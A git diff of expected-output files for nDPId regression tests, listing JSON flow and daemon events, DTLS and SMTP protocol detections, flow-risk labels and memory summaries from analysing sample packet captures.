+00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1644251733036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1644251733036,"pkt":"AAAAAAAAAAwAL85GCABFAACskrIAAD8R19+ql2nXSGaz2gG79VsAmK\/7F\/79AAEAAAAB\/fQAg13h0hdGzu1WNO2vU\/IbgHdYF0RFMS34pXUQgZKyQWeJANVsXGZq+9MFiIsKjl3D7HT8luq5HJMe4S4Zb3zMPZ6zO4gT5DOoVt7Is6ObHtcjGB0kUDwHIjrh3nhApNylKNWwtoR5rdprjwF7EWz\/b9mEcMLFaMAE3VniOUA3LqrIzirj"} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1644251732795,"flow_last_seen":1644251733063,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":1339,"flow_tot_l4_payload_len":7981,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1644251736135,"l3_proto":"ip4","src_ip":"135.215.56.198","dst_ip":"124.73.140.89","src_port":443,"dst_port":61189,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1644251732819,"flow_last_seen":1644251733371,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":1453,"flow_tot_l4_payload_len":17146,"flow_avg_l4_payload_len":571,"midstream":0,"thread_ts_msec":1644251736135,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"121.152.255.238","src_port":443,"dst_port":8460,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1644251732783,"flow_last_seen":1644251732783,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1644251736135,"l3_proto":"ip4","src_ip":"53.214.238.65","dst_ip":"199.186.151.155","src_port":53558,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1644251732859,"flow_last_seen":1644251736135,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":1453,"flow_tot_l4_payload_len":8826,"flow_avg_l4_payload_len":294,"midstream":0,"thread_ts_msec":1644251736135,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"72.102.179.218","src_port":443,"dst_port":62811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","packets-captured":91,"packets-processed":91,"total-skipped-flows":0,"total-l4-payload-len":34046,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1644251736135} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 91/91 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 34046 bytes +~~ total detected protocols..: 4 +~~ total active/idle flows...: 4/4 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6008896 bytes +~~ total memory freed........: 6008896 bytes +~~ total allocations/frees...: 120979/120979 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 475 chars +~~ json string max len.......: 2428 chars +~~ json string avg len.......: 1450 chars diff --git a/test/results/dtls_old_version.pcapng.out b/test/results/dtls_old_version.pcapng.out new file mode 100644 index 000000000..ab6b1beb7 --- /dev/null +++ b/test/results/dtls_old_version.pcapng.out @@ -0,0 +1,25 @@ +00469{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dtls_old_version.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_old_version.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388130600} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388130600,"flow_last_seen":1592388130600,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388130600,"l3_proto":"ip4","src_ip":"37.188.4.115","dst_ip":"70.66.6.128","src_port":56453,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388130600,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1592388130600,"pkt":"AAAAAAAAAAYArvxgCABFAAB\/OTwAAH8Ri0ElvARzRkIGgNyFAbsAaxY5FgEAAAAAAAAAAAAAVgEAAEoAAAAAAAAASgEAXunqImL3nzdrUBZ\/BhfTQm46UvY\/Zrav40oHNoY96qUgA8IpvhXWIFFe7w7KCq\/byTjgCP7o8hqBpXIG\/Tdba9gAAAIANQEA"} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388130600,"flow_last_seen":1592388130600,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388130600,"l3_proto":"ip4","src_ip":"37.188.4.115","dst_ip":"70.66.6.128","src_port":56453,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388131604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1592388131604,"pkt":"AAAAAAAAAAYArvxgCABFAAB\/OUAAAH8Riz0lvARzRkIGgNyFAbsAaxY5FgEAAAAAAAAAAAAAVgEAAEoAAAAAAAAASgEAXunqImL3nzdrUBZ\/BhfTQm46UvY\/Zrav40oHNoY96qUgA8IpvhXWIFFe7w7KCq\/byTjgCP7o8hqBpXIG\/Tdba9gAAAIANQEA"} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388131689,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1592388131689,"pkt":"AAAAAAAAAAYArvxgCABFAABM6u4AAPIRZsFGQgaAJbwEcwG73IUAOKixFgEAAAAAAAAAAAAAIwMAABcAAAAAAAAAFwEAFJQvJfDCZcKI8kzWgOcHI1Oo1d90"} +00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592388130600,"flow_last_seen":1592388137817,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":700,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1592388137817,"l3_proto":"ip4","src_ip":"37.188.4.115","dst_ip":"70.66.6.128","src_port":56453,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"dtls_old_version.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592388130600,"flow_last_seen":1592388137817,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":700,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1592388137817,"l3_proto":"ip4","src_ip":"37.188.4.115","dst_ip":"70.66.6.128","src_port":56453,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"dtls_old_version.pcapng","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":700,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1592388137817} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 7/7 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 700 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6003327 bytes +~~ total memory freed........: 6003327 bytes +~~ total allocations/frees...: 120885/120885 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 474 chars +~~ json string max len.......: 886 chars +~~ json string avg len.......: 670 chars diff --git a/test/results/dtls_session_id_and_coockie_both.pcap.out b/test/results/dtls_session_id_and_coockie_both.pcap.out index bb554b208..fe621d97e 100644 --- a/test/results/dtls_session_id_and_coockie_both.pcap.out +++ b/test/results/dtls_session_id_and_coockie_both.pcap.out @@ -2,11 +2,11 @@ 00572{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388499775} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388499775,"flow_last_seen":1592388499775,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388499775,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388499775,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1592388499775,"pkt":"AAAAAAAAAAEAvpsKCABFAAB\/T3sAAH8RdtO5xHHv33Rp98RRrZsAazO3Fv79AAAAAAAAAAAAVgEAAEoAAAAAAAAASv79P8FbOXt8ZkgBLvoC72ni+sdFNMYxwEb+hvs\/sv9L1B0gODIAL4OTx2HjtkquDfJ\/XJtXFrGeH36FJxKlpF5tST4AAALALAEA"} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388499775,"flow_last_seen":1592388499775,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388499775,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388499775,"flow_last_seen":1592388499775,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1592388499775,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388499786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1592388499786,"pkt":"AAAAAAAAAAcAwedSCABFAABMjnQAAPMRxAzfdGn3ucRx762bxFEAOGNSFv7\/AAAAAAAAAAAAIwMAABcAAAAAAAAAF\/7\/FBwO\/CFwEASeBoBTHTZO4F6qQqae"} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388499813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1592388499813,"pkt":"AAAAAAAAAAEAvpsKCABFAACTT3wAAH8Rdr65xHHv33Rp98RRrZsAf9dAFv79AAAAAAAAAAEAagEAAF4AAQAAAAAAXv79P8FbOXt8ZkgBLvoC72ni+sdFNMYxwEb+hvs\/sv9L1B0gODIAL4OTx2HjtkquDfJ\/XJtXFrGeH36FJxKlpF5tST4UHA78IXAQBJ4GgFMdNk7gXqpCpp4AAsAsAQA="} -01134{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"a1d48eca741e476d8ee735578a26bdbd","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} -00949{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +01134{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"a1d48eca741e476d8ee735578a26bdbd","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} +00949{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 00577{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":436,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1592388499833} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869567 bytes -~~ total memory freed........: 5869567 bytes -~~ total allocations/frees...: 118119/118119 +~~ total memory allocated....: 6003201 bytes +~~ total memory freed........: 6003201 bytes +~~ total allocations/frees...: 120881/120881 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 488 chars ~~ json string max len.......: 1139 chars diff --git a/test/results/emotet.pcap.out b/test/results/emotet.pcap.out index 4722a0603..3b3ac54d4 100644 --- a/test/results/emotet.pcap.out +++ b/test/results/emotet.pcap.out @@ -4,47 +4,46 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645830066121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1645830066121,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0wBJAAIAGPvkKAhlmwfwWVN\/dAkvNIWS2AAAAAIAC+vBkZgAAAgQFtAEDAwgBAQQC"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645830066871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1645830066871,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsxzIAAIAGd+HB\/BZUCgIZZgJL392K6SffzSFkt2AS+vDaogAAAgQFtA=="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645830066871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1645830066871,"pkt":"IOUqtpPxAAgCHEeuCABFAAAowBNAAIAGPwQKAhlmwfwWVN\/dAkvNIWS3iukn4FAQ+vDyXwAA"} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1645830066121,"flow_last_seen":1645830068348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1645830068348,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} -00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1645830066121,"flow_last_seen":1645830074471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1289,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1645830074471,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} -00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":627,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":627,"packets-processed":626,"total-skipped-flows":0,"total-l4-payload-len":404645,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1648563468993} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1645830066121,"flow_last_seen":1645830068348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1645830068348,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":627,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":627,"packets-processed":626,"total-skipped-flows":0,"total-l4-payload-len":404645,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1648563468993} 